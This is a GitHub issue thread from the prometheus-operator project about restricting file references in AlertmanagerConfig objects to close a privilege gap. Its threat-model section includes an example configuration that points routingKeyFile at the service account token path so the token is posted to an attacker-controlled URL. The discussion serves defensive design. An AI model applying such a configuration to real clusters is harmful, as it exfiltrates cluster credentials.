prometheus-operator icon indicating copy to clipboard operation
prometheus-operator copied to clipboard

Secure mechanism to allow file references in AlertmanagerConfig objects

Open simonpasquier opened this issue 1 year ago • 7 comments
trafficstars

Originally posted by @simonpasquier in https://github.com/prometheus-operator/prometheus-operator/issues/6346#issuecomment-2034841318

          >  are you saying that WebhookURLFile should not be a string, but a secretKeySelector? Or that we shouldn't offer this option at all?

In the upstream Alertmanager configuration, it is often possible to configure sensitive data as an in-lined secret value (e.g. routing_key for PagerDuty) or as a reference to file on-disk (e.g. routing_key_file).

The latter is presumably "more secure" (in Alertmanager context) because the value isn't exposed in-clear within the config file. But the threat model changes in the prometheus-operator context. Leveraging Kubernetes RBAC, it's possible that some users can create/update AlertmanagerConfig objects while they don't have permissions on the Alertmanager resource. Providing a way to reference files from the Alertmanager container's filesystem might allow those users to exfiltrate sensitive data like the service account bearer token (e.g. /var/run/secrets/kubernetes.io/serviceaccount/token).

kind: AlertmanagerConfig
spec:
  receivers:
  - pager_duty_configs:
    - url: http://my-service.example.com
      routingKeyFile: /var/run/secrets/kubernetes.io/serviceaccount/token

In this case, someone controlling http://my-service.example.com and would be able to retrieve the token value from the posted payload.

We made the "mistake" early on with ServiceMonitor and had to introduce the .spec.arbitraryFSAccessThroughSMs.deny field in Prometheus to prevent direct access to the Prometheus container filesystem but for backward compatibility reason, it's an opt-in behavior.

Note: there's also a UX problem: AlertmanagerConfig owners need to know the file paths in advance which creates implicit coupling with the Alertmanager owner.

In practice, I would disallow the use of *File fields for AlertmanagerConfig CRDs by default except in 2 cases:

  • For the AlertmanagerConfig object used to populate the top-level configuration (.spec.alertmanagerConfiguration.name). In this case, the same persona should manage the Alertmanager and AlertmanagerConfig objects so it makes sense to allow file references.
  • The Alertmanager owner explicitly allows file references in the Alertmanager spec (for instance .spec.allowLocalFileReferences: true). Again it could make sense when Alertmanager and AlertmanagerConfig owners are the same person.

simonpasquier avatar Apr 08 '24 13:04 simonpasquier

@simonpasquier let me know if you'd like to make this change, happy to help

dongjiang1989 avatar Apr 15 '24 07:04 dongjiang1989

@dongjiang1989 thanks for offering! Before jumping ahead, let's hear from other maintainers, in particular @ArthurSens asked from more details.

simonpasquier avatar Apr 15 '24 14:04 simonpasquier

Sorry, I don't mean to block the work here 😬

I remember that during the office hours, I mentioned that the UX for the proposed solution still feels a bit clunky, but I honestly couldn't think of anything better. If someone wants to start working on this, it would be great if we can think of something easier to users, but please don't see my comments as a blocker

ArthurSens avatar Apr 25 '24 19:04 ArthurSens

@ArthurSens can you expand on what you consider being "clunky"?

simonpasquier avatar Apr 29 '24 14:04 simonpasquier

@ArthurSens can you expand on what you consider being "clunky"?

I feel bad about this, but I honestly don't remember what the problem was :( You can ignore my previous comments

ArthurSens avatar May 15 '24 18:05 ArthurSens

I was taking a look at open PRs today and I've crossed paths with this one (https://github.com/prometheus-operator/prometheus-operator/pull/6358), which introduces the usage of files for web configuration.

I was wondering if we would hit the same problem there. Could someone "steal" file content somehow?

ArthurSens avatar May 15 '24 18:05 ArthurSens

Web configuration is different because these fields live inside the Prometheus/Alertmanager objects. The concern here is when the file reference exists in a "non-pod" CRD like ServiceMonitor, AlertmanagerConfig, ...

simonpasquier avatar May 23 '24 15:05 simonpasquier